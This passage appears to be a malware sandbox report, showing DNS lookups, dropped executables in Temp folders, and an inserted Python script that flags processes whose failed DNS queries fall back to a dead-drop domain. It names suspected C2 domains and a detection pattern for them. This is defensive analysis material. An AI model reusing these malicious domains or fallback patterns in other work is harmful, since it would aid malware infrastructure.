                      DNS Response (×2, same addresses): 172.217.16.238, 216.58.204.78, 142.250.200.46, 172.217.169.46, 142.250.179.238, 142.250.200.14, 216.58.212.206, 142.250.187.206, 142.250.180.14, 216.58.201.110, 142.250.178.14, 216.58.213.14, 216.58.212.238, 142.250.187.238, 172.217.169.14

                  • 8.8.8.8:53  youtube-ui.l.google.com  dns  firefox.exe  sent 69 B, recv 309 B, pkts 1/1
                      DNS Request: youtube-ui.l.google.com
                      DNS Response: 142.250.187.206, 142.250.187.238, 216.58.204.78, 172.217.169.46, 142.250.200.46, 142.250.180.14, 172.217.169.14, 142.250.178.14, 142.250.200.14, 172.217.16.238, 216.58.201.110, 142.250.179.238, 216.58.212.206, 216.58.212.238, 216.58.213.14

                  • 8.8.8.8:53  youtube-ui.l.google.com  dns  firefox.exe  sent 69 B, recv 181 B, pkts 1/1
                      DNS Request: youtube-ui.l.google.com
                      DNS Response: 2a00:1450:4009:826::200e, 2a00:1450:4009:822::200e, 2a00:1450:4009:823::200e, 2a00:1450:4009:827::200e

                  • 172.217.16.238:443  youtube-ui.l.google.com  https  firefox.exe  sent 4.1kB, recv 10.4kB, pkts 10/15

                  • 8.8.8.8:53  consent.youtube.com  dns  firefox.exe  sent 65 B, recv 81 B, pkts 1/1
                      DNS Request: consent.youtube.com
                      DNS Response: 142.250.200.46

                  • 8.8.8.8:53  consent.youtube.com  dns  firefox.exe  sent 65 B, recv 81 B, pkts 1/1
                      DNS Request: consent.youtube.com
                      DNS Response: 142.250.200.46

                  • 8.8.8.8:53  firefox-settings-attachments.cdn.mozilla.net  dns  firefox.exe  sent 90 B, recv 177 B, pkts 1/1
                      DNS Request: firefox-settings-attachments.cdn.mozilla.net
                      DNS Response: 34.117.121.53

                  • 8.8.8.8:53  consent.youtube.com  dns  firefox.exe  sent 65 B, recv 93 B, pkts 1/1
                      DNS Request: consent.youtube.com
                      DNS Response: 2a00:1450:4009:823::200e

                  • 8.8.8.8:53  attachments.prod.remote-settings.prod.webservices.mozgcp.net  dns  firefox.exe  sent 106 B, recv 122 B, pkts 1/1
                      DNS Request: attachments.prod.remote-settings.prod.webservices.mozgcp.net
                      DNS Response: 34.117.121.53

                  • 8.8.8.8:53  attachments.prod.remote-settings.prod.webservices.mozgcp.net  dns  firefox.exe  sent 212 B, recv 199 B, pkts 2/1
                      DNS Request (×2): attachments.prod.remote-settings.prod.webservices.mozgcp.net

                  • 142.250.200.46:443  consent.youtube.com  https  firefox.exe  sent 2.2kB, recv 9.4kB, pkts 10/11

                  • 8.8.8.8:53  160.181.213.54.in-addr.arpa  dns  -  sent 73 B, recv 137 B, pkts 1/1
                      DNS Request: 160.181.213.54.in-addr.arpa

                  • 8.8.8.8:53  238.16.217.172.in-addr.arpa  dns  -  sent 73 B, recv 142 B, pkts 1/1
                      DNS Request: 238.16.217.172.in-addr.arpa

                  • 8.8.8.8:53  150.225.228.44.in-addr.arpa  dns  -  sent 73 B, recv 137 B, pkts 1/1
                      DNS Request: 150.225.228.44.in-addr.arpa

                  • 8.8.8.8:53  www.google.com  dns  firefox.exe  sent 60 B, recv 76 B, pkts 1/1
                      DNS Request: www.google.com
                      DNS Response: 142.250.187.196

                  • 8.8.8.8:53  www.google.com  dns  firefox.exe  sent 120 B, recv 152 B, pkts 2/2
                      DNS Request (×2): www.google.com
                      DNS Response (×2): 142.250.187.196

                  • 8.8.8.8:53  www.google.com  dns  firefox.exe  sent 60 B, recv 88 B, pkts 1/1
                      DNS Request: www.google.com
                      DNS Response: 2a00:1450:4009:81f::2004

                  • 8.8.8.8:53  74.204.58.216.in-addr.arpa  dns  -  sent 72 B, recv 171 B, pkts 1/1
                      DNS Request: 74.204.58.216.in-addr.arpa

                  • 8.8.8.8:53  195.187.250.142.in-addr.arpa  dns  -  sent 74 B, recv 112 B, pkts 1/1
                      DNS Request: 195.187.250.142.in-addr.arpa

                  • 8.8.8.8:53  196.187.250.142.in-addr.arpa  dns  -  sent 74 B, recv 112 B, pkts 1/1
                      DNS Request: 196.187.250.142.in-addr.arpa

                  • 142.250.187.196:443  www.google.com  https  firefox.exe  sent 2.1kB, recv 10.7kB, pkts 9/11

                  • 8.8.8.8:53  prod.balrog.prod.cloudops.mozgcp.net  dns  firefox.exe  sent 164 B, recv 196 B, pkts 2/2
                      DNS Request (×2): prod.balrog.prod.cloudops.mozgcp.net
                      DNS Response (×2): 35.244.181.201

                  • 8.8.8.8:53  prod.balrog.prod.cloudops.mozgcp.net  dns  firefox.exe  sent 82 B, recv 175 B, pkts 1/1
                      DNS Request: prod.balrog.prod.cloudops.mozgcp.net

                  • 8.8.8.8:53  201.181.244.35.in-addr.arpa  dns  -  sent 73 B, recv 126 B, pkts 1/1
                      DNS Request: 201.181.244.35.in-addr.arpa

                  • 8.8.8.8:53  ciscobinary.openh264.org  dns  firefox.exe  sent 140 B, recv 572 B, pkts 2/2
                      DNS Request (×2): ciscobinary.openh264.org
                      DNS Response (×2, same addresses): 88.221.134.155, 88.221.134.209

                  • 8.8.8.8:53  a19.dscg10.akamai.net  dns  firefox.exe  sent 134 B, recv 99 B, pkts 2/1
                      DNS Request (×2): a19.dscg10.akamai.net
                      DNS Response: 88.221.134.209, 88.221.134.155

                  • 8.8.8.8:53  a19.dscg10.akamai.net  dns  firefox.exe  sent 134 B, recv 246 B, pkts 2/2
                      DNS Request (×2): a19.dscg10.akamai.net
                      DNS Response (×2, same addresses): 2a02:26f0:a1::58dd:869b, 2a02:26f0:a1::58dd:86d1

                  • 8.8.8.8:53  155.134.221.88.in-addr.arpa  dns  -  sent 73 B, recv 139 B, pkts 1/1
                      DNS Request: 155.134.221.88.in-addr.arpa

                  • 8.8.8.8:53  redirector.gvt1.com  dns  firefox.exe  sent 65 B, recv 81 B, pkts 1/1
                      DNS Request: redirector.gvt1.com
                      DNS Response: 142.250.187.206

                  • 8.8.8.8:53  redirector.gvt1.com  dns  firefox.exe  sent 130 B, recv 81 B, pkts 2/1
                      DNS Request (×2): redirector.gvt1.com
                      DNS Response: 142.250.187.206

                  • 8.8.8.8:53  redirector.gvt1.com  dns  firefox.exe  sent 65 B, recv 93 B, pkts 1/1
                      DNS Request: redirector.gvt1.com
                      DNS Response: 2a00:1450:4009:81f::200e

                  • 142.250.187.206:443  redirector.gvt1.com  https  firefox.exe  sent 7.6kB, recv 12.2kB, pkts 14/13

                  • 8.8.8.8:53  r4---sn-aigzrnsz.gvt1.com  dns  firefox.exe  sent 142 B, recv 116 B, pkts 2/1
                      DNS Request (×2): r4---sn-aigzrnsz.gvt1.com
                      DNS Response: 74.125.175.169

                  • 8.8.8.8:53  r4.sn-aigzrnsz.gvt1.com  dns  firefox.exe  sent 69 B, recv 85 B, pkts 1/1
                      DNS Request: r4.sn-aigzrnsz.gvt1.com
                      DNS Response: 74.125.175.169

                  • 8.8.8.8:53  r4.sn-aigzrnsz.gvt1.com  dns  firefox.exe  sent 69 B, recv 97 B, pkts 1/1
                      DNS Request: r4.sn-aigzrnsz.gvt1.com
                      DNS Response: 2a00:1450:4009:1b::9

                  • 8.8.8.8:53  206.187.250.142.in-addr.arpa  dns  -  sent 74 B, recv 113 B, pkts 1/1
                      DNS Request: 206.187.250.142.in-addr.arpa

                  • 8.8.8.8:53  169.175.125.74.in-addr.arpa  dns  -  sent 73 B, recv 111 B, pkts 1/1
                      DNS Request: 169.175.125.74.in-addr.arpa

                  • 74.125.175.169:443  r4.sn-aigzrnsz.gvt1.com  https  firefox.exe  sent 2.0kB, recv 6.1kB, pkts 7/9

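The DNS table above contains one pattern worth automating rather than eyeballing: f3745b045c.exe queries seven .biz domains that never receive an answer in any of its lookups and then resolves steamcommunity.com on the first try, while the unanswered lookups from firefox.exe are all for names the same process resolves successfully in another query (the typical A/AAAA pair). The script below is an added example, not part of the original report and not a tria.ge feature, that encodes that distinction and runs it over a constructed "process|qname|answers" log modelled on the entries above; the line format, the min_dead threshold and the known_bad blocklist are assumptions chosen for the example.

```python
"""Per-process DNS triage over a sandbox network log.

Flags a process when (a) it queries a domain on a supplied blocklist, or
(b) it queries several distinct domains that never resolve and then falls
back to one that does, the shape of a C2 fallback list ending in a dead drop.
Added example; the log format below is an assumption, not a tria.ge export.
"""
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class DnsRecord:
    process: str
    qname: str
    answers: tuple[str, ...]  # empty when no response was observed


# Constructed sample in the assumed "process|qname|answers" format, modelled
# on the entries in the table above (answers comma-separated, blank if none).
SAMPLE_LOG = """\
f3745b045c.exe|se-blurry.biz|
f3745b045c.exe|se-blurry.biz|
f3745b045c.exe|zinc-sneark.biz|
f3745b045c.exe|dwell-exclaim.biz|
f3745b045c.exe|formy-spill.biz|
f3745b045c.exe|dare-curbys.biz|
f3745b045c.exe|print-vexer.biz|
f3745b045c.exe|impend-differ.biz|
f3745b045c.exe|steamcommunity.com|23.214.143.155
Z9Pp9pM.exe|fightlsoser.click|172.67.213.48,104.21.35.43
3EUEYgl.exe|t.me|149.154.167.99
3EUEYgl.exe|ooihu.shop|116.203.10.31
firefox.exe|youtube.com|216.58.213.14
firefox.exe|shavar.prod.mozaws.net|44.228.225.150,35.85.93.176
firefox.exe|shavar.prod.mozaws.net|
firefox.exe|prod.ads.prod.webservices.mozgcp.net|34.117.188.166
firefox.exe|prod.ads.prod.webservices.mozgcp.net|
"""


def parse_dns_log(text: str) -> list[DnsRecord]:
    """Parse "process|qname|answers" lines; blank lines and # comments are skipped."""
    records: list[DnsRecord] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        process, qname, answers = line.split("|", 2)
        addrs = tuple(a.strip() for a in answers.split(",") if a.strip())
        records.append(DnsRecord(process, qname.lower().rstrip("."), addrs))
    return records


def never_resolved(records: list[DnsRecord]) -> dict[str, set[str]]:
    """Per process, the names that got no answer in ANY of its queries.

    A name that fails once but succeeds in another query (typically an AAAA
    lookup beside a successful A lookup) counts as resolved, so ordinary
    dual-stack browser traffic does not inflate the count.
    """
    seen: dict[str, set[str]] = defaultdict(set)
    ever_ok: dict[str, set[str]] = defaultdict(set)
    for r in records:
        seen[r.process].add(r.qname)
        if r.answers:
            ever_ok[r.process].add(r.qname)
    return {p: seen[p] - ever_ok[p] for p in seen}


def flag_c2_fallback(
    records: list[DnsRecord],
    min_dead: int = 3,
    known_bad: frozenset[str] = frozenset(),
) -> dict[str, list[str]]:
    """Return {process: [reasons]} for processes whose DNS looks like C2 activity."""
    dead = never_resolved(records)
    by_proc: dict[str, list[DnsRecord]] = defaultdict(list)
    for r in records:
        by_proc[r.process].append(r)

    findings: dict[str, list[str]] = {}
    for proc, recs in by_proc.items():
        reasons: list[str] = []
        hits = sorted({r.qname for r in recs} & known_bad)
        if hits:
            reasons.append("queried blocklisted domain(s): " + ", ".join(hits))
        # Walk the queries in order: how many distinct dead names precede the
        # first successful resolution? A long run followed by a hit is the
        # fallback-list signature; a lone failure is just noise.
        dead_run: set[str] = set()
        for r in recs:
            if r.qname in dead[proc]:
                dead_run.add(r.qname)
            elif r.answers and len(dead_run) >= min_dead:
                reasons.append(
                    f"{len(dead_run)} never-resolving domains, then fallback to {r.qname}"
                )
                break
        if reasons:
            findings[proc] = reasons
    return findings


if __name__ == "__main__":
    for proc, why in flag_c2_fallback(parse_dns_log(SAMPLE_LOG)).items():
        print(proc, "->", "; ".join(why))
```

Run as-is it reports only f3745b045c.exe; Z9Pp9pM.exe and 3EUEYgl.exe each resolve their single domain at once and are only caught if those names are put on the known_bad blocklist, which is the point: a resolution-failure heuristic complements, rather than replaces, the extracted C2 list.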
                  MITRE ATT&CK Enterprise v15

                  Downloads

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\IQ93NPJ1\download[1].htm

                    Filesize

                    1B

                  • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\7fmsgkth.default-release\activity-stream.discovery_stream.json

                    Filesize

                    19KB

                  • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\7fmsgkth.default-release\cache2\entries\92F4D5A4F9CED6E2E644D803AEE3647A0EA4D984

                    Filesize

                    13KB

                  • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\7fmsgkth.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                    Filesize

                    15KB

                  • C:\Users\Admin\AppData\Local\Temp\1013644001\Z9Pp9pM.exe

                    Filesize

                    2.5MB

                  • C:\Users\Admin\AppData\Local\Temp\1013675001\H3tyh96.exe

                    Filesize

                    1.7MB

                  • C:\Users\Admin\AppData\Local\Temp\1013765001\yiklfON.exe

                    Filesize

                    7.4MB

                  • C:\Users\Admin\AppData\Local\Temp\1013771001\3EUEYgl.exe

                    Filesize

                    1.8MB

                  • C:\Users\Admin\AppData\Local\Temp\1013794001\f47698ce5b.exe

                    Filesize

                    1.9MB

                  • C:\Users\Admin\AppData\Local\Temp\1013795001\f3745b045c.exe

                    Filesize

                    1.8MB

                  • C:\Users\Admin\AppData\Local\Temp\1013796001\0858ba6bc7.exe

                    Filesize

                    1.7MB

                  • C:\Users\Admin\AppData\Local\Temp\1013797001\a0897fb31f.exe

                    Filesize

                    949KB

                  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4L684S.exe

                    Filesize

                    2.6MB

                  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\g1t41.exe

                    Filesize

                    5.3MB

                  • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3d69R.exe

                    Filesize

                    1.7MB

                  • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\j7v75.exe

                    Filesize

                    3.5MB

                  • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1c55e6.exe

                    Filesize

                    3.1MB

                  • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2g5323.exe

                    Filesize

                    1.8MB

                  • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                    Filesize

                    479KB

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\AlternateServices.bin

                    Filesize

                    6KB

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\AlternateServices.bin

                    Filesize

                    8KB

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\datareporting\glean\db\data.safe.bin

                    Filesize

                    14KB

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\datareporting\glean\db\data.safe.bin

                    Filesize

                    15KB

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\datareporting\glean\db\data.safe.bin

                    Filesize

                    23KB

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\datareporting\glean\db\data.safe.bin

                    Filesize

                    5KB

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\datareporting\glean\db\data.safe.tmp

                    Filesize

                    15KB

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\datareporting\glean\db\data.safe.tmp

                    Filesize

                    5KB

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\datareporting\glean\db\data.safe.tmp

                    Filesize

                    15KB

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\datareporting\glean\pending_pings\1da7255f-05dc-4f54-ae34-3ad2735c3474

                    Filesize

                    671B

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\datareporting\glean\pending_pings\9177695e-4862-49c1-a285-99607a419ce2

                    Filesize

                    25KB

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\datareporting\glean\pending_pings\d351f73c-dda2-4160-8199-465b05a862dc

                    Filesize

                    982B

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

                    Filesize

                    1.1MB

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

                    Filesize

                    116B

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\prefs-1.js

                    Filesize

                    10KB

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\prefs-1.js

                    Filesize

                    11KB

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\prefs.js

                    Filesize

                    10KB

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

                    Filesize

                    1.5MB
